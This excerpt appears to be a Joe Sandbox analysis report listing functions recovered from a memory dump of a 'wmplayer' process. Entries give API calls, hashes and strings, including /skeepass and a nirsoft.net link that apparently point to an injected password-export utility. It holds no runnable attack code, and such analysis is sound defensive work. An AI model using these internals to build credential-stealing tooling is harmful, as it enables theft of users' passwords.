                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1043902810-0
                                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                            Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                            • API String ID: 2899246560-1542517562
                                                                                            • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                            • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                            • memset.MSVCRT ref: 00408606
                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID: ---
                                                                                            • API String ID: 3437578500-2854292027
                                                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                            Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                            • memset.MSVCRT ref: 00410892
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1010922700-0
                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                            Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                            • free.MSVCRT ref: 004186C7
                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                            • free.MSVCRT ref: 004186E0
                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                            • free.MSVCRT ref: 00418716
                                                                                            • free.MSVCRT ref: 0041872A
                                                                                            • free.MSVCRT ref: 00418749
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                                            • String ID: |A
                                                                                            • API String ID: 3356672799-1717621600
                                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                            • API String ID: 2081463915-1959339147
                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                            Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2012295524-70141382
                                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                            Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                            • API String ID: 667068680-3953557276
                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1700100422-0
                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                            • String ID:
                                                                                            • API String ID: 552707033-0
                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                            Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                            • String ID: 4$h
                                                                                            • API String ID: 4066021378-1856150674
                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                            Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: %%0.%df
                                                                                            • API String ID: 3473751417-763548558
                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                            Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                            • String ID: A
                                                                                            • API String ID: 2892645895-3554254475
                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                            Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                            • String ID: caption
                                                                                            • API String ID: 973020956-4135340389
                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                            Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                            • API String ID: 1283228442-2366825230
                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                            Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                            • memset.MSVCRT ref: 004139B8
